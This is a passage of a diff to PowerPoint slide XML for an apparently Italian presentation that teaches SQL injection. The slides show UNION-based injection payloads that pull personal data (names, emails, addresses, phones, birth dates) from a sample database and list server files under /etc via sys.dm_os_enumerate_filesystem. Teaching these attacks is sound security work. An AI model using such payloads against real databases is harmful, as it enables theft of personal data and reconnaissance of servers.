+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+      </p:pic>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="130" name="Google Shape;130;p31">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{184703A3-5167-660A-F30A-1C5DE0B43051}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title" idx="2"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1441500" y="2123627"/>
+            <a:ext cx="6261000" cy="2292051"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="127000" lvl="0">
+              <a:lnSpc>
+                <a:spcPct val="115000"/>
+              </a:lnSpc>
+              <a:buClr>
+                <a:srgbClr val="D93232"/>
+              </a:buClr>
+              <a:buSzPts val="1600"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>SELECT</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>	Id, Title, StartDate, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>EndDate</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>, Result, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>UserId</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>FROM </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>dbo.Courses</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>WHERE </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>UserId</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t> = </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="accent1"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>{</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:solidFill>
+                  <a:schemeClr val="accent5">
+                    <a:lumMod val="60000"/>
+                    <a:lumOff val="40000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>userId</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="accent1"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>}</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>	AND Title LIKE '%</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>' UNION ALL SELECT NULL, CONCAT(FirstName, ' ', LastName, ' (', </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>EmailAddress</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>, ') ', AddressLine1, AddressLine2, ', ', City, ', ', </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>StateProvinceCode</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>, ' ', </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>PostalCode</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>, ' - ', Phone), </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>BirthDate</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>, NULL, NULL, NULL FROM AdventureWorksDW2022.dbo.ProspectiveBuyer ORDER BY 2--</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>%' ORDER BY StartDate;</a:t>
+            </a:r>
+            <a:endParaRPr sz="1400" dirty="0">
+              <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3677232926"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide25.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name="Shape 127">
+          <a:extLst>
+            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
               <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F78DFD79-353B-62CC-0721-736AA8D7D414}"/>
             </a:ext>
           </a:extLst>
@@ -18675,7 +19582,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide25.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide26.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -19028,7 +19935,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide26.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide27.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -19345,7 +20252,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide27.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide28.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -19684,7 +20591,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide28.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide29.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -20004,367 +20911,6 @@
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
         <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1039999900"/>
-      </p:ext>
-    </p:extLst>
-  </p:cSld>
-  <p:clrMapOvr>
-    <a:masterClrMapping/>
-  </p:clrMapOvr>
-</p:sld>
-</file>
-
-<file path=ppt/slides/slide29.xml><?xml version="1.0" encoding="utf-8"?>
-<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
-  <p:cSld>
-    <p:spTree>
-      <p:nvGrpSpPr>
-        <p:cNvPr id="1" name="Shape 127">
-          <a:extLst>
-            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA86480F-F968-3F96-96E7-A605D3160EED}"/>
-            </a:ext>
-          </a:extLst>
-        </p:cNvPr>
-        <p:cNvGrpSpPr/>
-        <p:nvPr/>
-      </p:nvGrpSpPr>
-      <p:grpSpPr>
-        <a:xfrm>
-          <a:off x="0" y="0"/>
-          <a:ext cx="0" cy="0"/>
-          <a:chOff x="0" y="0"/>
-          <a:chExt cx="0" cy="0"/>
-        </a:xfrm>
-      </p:grpSpPr>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="128" name="Google Shape;128;p31">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B52626A5-45A6-18D0-7613-BFA863290EEE}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr txBox="1">
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="title"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="1290150" y="1454970"/>
-            <a:ext cx="6563700" cy="572700"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
-            <a:noAutofit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr lvl="0" algn="ctr"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>Elencare</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>i</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> file </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>sul</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> server*</a:t>
-            </a:r>
-            <a:endParaRPr dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:pic>
-        <p:nvPicPr>
-          <p:cNvPr id="129" name="Google Shape;129;p31">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05FCEF64-BAEF-0734-31E9-C46228160C64}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvPicPr preferRelativeResize="0"/>
-          <p:nvPr/>
-        </p:nvPicPr>
-        <p:blipFill>
-          <a:blip r:embed="rId3">
-            <a:alphaModFix/>
-          </a:blip>
-          <a:stretch>
-            <a:fillRect/>
-          </a:stretch>
-        </p:blipFill>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="4116500" y="448013"/>
-            <a:ext cx="911000" cy="911000"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-          <a:ln>
-            <a:noFill/>
-          </a:ln>
-        </p:spPr>
-      </p:pic>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="130" name="Google Shape;130;p31">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62A27826-F33A-EF78-7EE7-57721E61D1C3}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr txBox="1">
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="title" idx="2"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="1128450" y="2195169"/>
-            <a:ext cx="6887100" cy="2292051"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
-            <a:noAutofit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="127000" lvl="0">
-              <a:lnSpc>
-                <a:spcPct val="115000"/>
-              </a:lnSpc>
-              <a:buClr>
-                <a:srgbClr val="D93232"/>
-              </a:buClr>
-              <a:buSzPts val="1600"/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>SELECT</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>	Id, Title, StartDate, </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>EndDate</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>, Result, </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>UserId</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>FROM </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>dbo.Courses</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>WHERE </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>UserId</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t> = </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:solidFill>
-                  <a:schemeClr val="accent1"/>
-                </a:solidFill>
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>{</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
-                <a:solidFill>
-                  <a:schemeClr val="accent5">
-                    <a:lumMod val="60000"/>
-                    <a:lumOff val="40000"/>
-                  </a:schemeClr>
-                </a:solidFill>
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>userId</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:solidFill>
-                  <a:schemeClr val="accent1"/>
-                </a:solidFill>
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>}</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>	AND Title LIKE '%</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="FF0000"/>
-                </a:solidFill>
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>' UNION ALL SELECT NULL, </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
-                <a:solidFill>
-                  <a:srgbClr val="FF0000"/>
-                </a:solidFill>
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>full_filesystem_path</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="FF0000"/>
-                </a:solidFill>
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>, NULL, NULL, NULL, NULL FROM </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
-                <a:solidFill>
-                  <a:srgbClr val="FF0000"/>
-                </a:solidFill>
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>sys.dm_os_enumerate_filesystem</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="FF0000"/>
-                </a:solidFill>
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>('/</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
-                <a:solidFill>
-                  <a:srgbClr val="FF0000"/>
-                </a:solidFill>
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>etc</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="FF0000"/>
-                </a:solidFill>
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>','*.*') ORDER BY 2--</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>%' ORDER BY StartDate;</a:t>
-            </a:r>
-            <a:endParaRPr sz="1400" dirty="0">
-              <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-    </p:spTree>
-    <p:extLst>
-      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2131889864"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -20455,7 +21001,15 @@
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t> query semplice </a:t>
+              <a:t> query </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>innocua</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0" err="1"/>
@@ -20575,6 +21129,367 @@
 </file>
 
 <file path=ppt/slides/slide30.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name="Shape 127">
+          <a:extLst>
+            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA86480F-F968-3F96-96E7-A605D3160EED}"/>
+            </a:ext>
+          </a:extLst>
+        </p:cNvPr>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="128" name="Google Shape;128;p31">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B52626A5-45A6-18D0-7613-BFA863290EEE}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1290150" y="1454970"/>
+            <a:ext cx="6563700" cy="572700"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr lvl="0" algn="ctr"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>Elencare</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>i</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> file </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>sul</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> server*</a:t>
+            </a:r>
+            <a:endParaRPr dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="129" name="Google Shape;129;p31">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05FCEF64-BAEF-0734-31E9-C46228160C64}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr preferRelativeResize="0"/>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId3">
+            <a:alphaModFix/>
+          </a:blip>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="4116500" y="448013"/>
+            <a:ext cx="911000" cy="911000"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+      </p:pic>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="130" name="Google Shape;130;p31">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62A27826-F33A-EF78-7EE7-57721E61D1C3}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title" idx="2"/>
+          </p:nvPr>
